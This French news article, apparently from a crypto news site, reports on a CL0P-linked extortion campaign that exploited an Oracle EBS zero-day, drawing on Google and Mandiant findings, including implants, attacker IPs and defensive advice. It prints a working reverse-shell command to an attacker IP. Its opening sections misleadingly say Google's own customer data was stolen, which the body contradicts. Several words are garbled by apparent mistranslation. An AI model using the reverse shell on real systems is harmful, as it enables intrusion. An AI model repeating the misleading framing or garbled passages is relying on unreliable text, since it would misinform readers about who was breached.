Google révèle : Des « quantités massives de données clients » piratées dans une vaste campagne d’extorsion
Une faille de sécurité majeure frappe le géant technologique - des hackers ont dérobé des montagnes d'informations sensibles.
L'attaque ciblée
Les cybercriminels ont exploité des vulnérabilités système pour siphonner des données clients à échelle industrielle. Les équipes de sécurité de Google ont détecté des mouvements suspects sur plusieurs serveurs cloud simultanément.
Le chantage organisé
Les auteurs menacent maintenant de divulguer les informations volées si leurs exigences financières ne sont pas satisfaites. Des quantités massives de données personnelles et professionnelles sont utilisées comme monnaie d'échange.
Les conséquences potentielles
Cette violation pourrait exposer des millions d'utilisateurs à des risques d'usurpation d'identité et de fraude. Les équipes techniques travaillent en urgence pour contenir les dégâts et notifier les personnes concernées.
Une triste réalité du monde numérique moderne - où même les géants tech peinent à protéger nos vies numériques, tandis que les banques traditionnelles continuent de facturer des frais pour sécuriser des coffres... vides.
Google et Mandiant révèlent une exploitation zero-day
Selon le rapport de Google, les attaquants ont envoyé un « volume élevé » d'e-mails aux dirigeants de plusieurs organisations, alléguant des violations de leurs environnements Oracle EBS et menaçant de publier les données volées à moins qu'une rançon ne soit payée .
Les e-mails, envoyés depuis des centaines de comptes tiers compromis, comprenaient des adresses de contact, [email protected] et [email protected] , précédemment liées au site de fuite de données CL0P.
L'enquête conjointe de Google et Mandiant a révélé que l'exploitation de cette faille remontait à juillet 2025, possiblement liée à une vulnérabilité zero-day désormais traccomme CVE-2025-61882. Dans certains cas, les attaquants auraient exfiltré « une quantité importante de données » des organisations affectées.
Oracle a déclaré que les failles exploitées avaient été corrigées en juillet, mais a publié des mises à jour d'urgence le 4 octobre pour corriger d'autres vulnérabilités. Oracle a conseillé à ses clients d'utiliser les dernières mises à jour de correctifs critiques et a souligné l'importance de se tenir au courant de tous les correctifs pour éviter toute compromission.
La marque d'extorsion CL0P est active depuis 2020 et est historiquement liée au groupe de cybercriminalité FIN11. Elle a déjà ciblé des systèmes de transfert de fichiers gérés comme MOVEit, GoAnywhere et Accellion FTA. Ces campagnes ont suivi un schéma similaire : exploitation massive de vulnérabilités zero-day, vol de données sensibles et extorsion quelques semaines plus tard.
Au moment du rapport , aucune nouvelle victime de cet incident dent apparue sur le site de fuite de données de CL0P.
Implants Java complexes à plusieurs étapes
Google et Mandiant révèle que les attaquants ont utilisé plusieurs chaînes d'exploitation ciblant les composants Oracle EBS, notamment UiServlet et SyncServlet, pour réaliser l'exécution de code à distance et implanter des implants Java à plusieurs étapes.
En juillet 2025, une activité suspecte a été détectée concernant des requêtes HTTP adressées à /OA_HTML/configurator/UiServlet. Cette activité suspecte a été observée dans un autre exploit, apparu ultérieurement dans un groupe Telegram nommé « SCATTERED LAPSUS$ HUNTERS ».
L'exploit divulgué a utilisé plusieurs techniques avancées pour prendre le contrôle des serveurs ciblés, telles qu'une falsification de requête côté serveur (SSRF), un contournement d'authentification et une injection de modèle XSL.
En août 2025, les attaquants ont commencé à utiliser un autre outil appelé SyncServlet pour créer et exécuter des modèles malveillants dans la base de données EBS. Ces modèles contenaient des charges utiles XSL codées en Base64 qui chargeaient des logiciels malveillants Java directement en mémoire.
Parmi les implantsdentfiguraient GOLDVEIN.JAVA, un téléchargeur qui récupérait les charges utiles de deuxième étape à partir de serveurs de commande contrôlés par les attaquants, et une chaîne multicouche baptisée SAGE, qui installait des filtres de servlet Java persistants pour une exploitation ultérieure.
Après avoir piraté le système, les attaquants ont utilisé le compte EBS « applmgr » pour explorer le système, collecter des informations sur le réseau et le système, puis installer d'autres fichiers malveillants. Ils ont également utilisé des commandes shell telles que ip addr, netstat -an et bash -i >& /dev/tcp/200.107.207.26/53 0>&1.
Les adresses IP 200.107.207.26 et 161.97.99.49 ont étédentlors de tentatives d'exploitation, tandis que 162.55.17.215:443 et 104.194.11.200:443 ont été répertoriées comme serveurs de commande et de contrôle pour la charge utile GOLDVEIN.JAVA.
GTIG n'a pas formellement lié l'opération à un groupe connu, mais la campagne partage des similitudes avec FIN11, un groupe de cybercriminalité à motivation financière qui était auparavant associé au ransomware CL0P et aux opérations de vol de données à grande échelle.
Mandiant a également noté que l'un des comptes compromis utilisés pour envoyer les e-mails d'extorsion avait été utilisé dans des attaques antérieures liées à FIN11.
Il est vivement recommandé aux utilisateurs de se méfier des tables de base de données EBS XDO_TEMPLATES_B et XDO_LOBS, en particulier celles dont les noms commencent par « TMP » ou « DEF », et de bloquer le trafic Internet externe provenant des serveurs EBS pour empêcher davantage d'extorsion de données.
Les organisations recommandent également une surveillance étroite des requêtes HTTP vers des points de terminaison tels que /OA_HTML/SyncServlet et /OA_HTML/configurator/UiServlet, et l'analyse des vidages de mémoire pour détecter des preuves de charges utiles Java en mémoire.
Google a averti que les groupes liés à CL0P continueront presque certainement à consacrer leurs ressources à l'acquisition d'exploits zero-day.
Soyez visible là où ça compte. Faites de la publicité dans Cryptopolitan Research et touchez les investisseurs et les créateurs de cryptomonnaies les plus avisés.
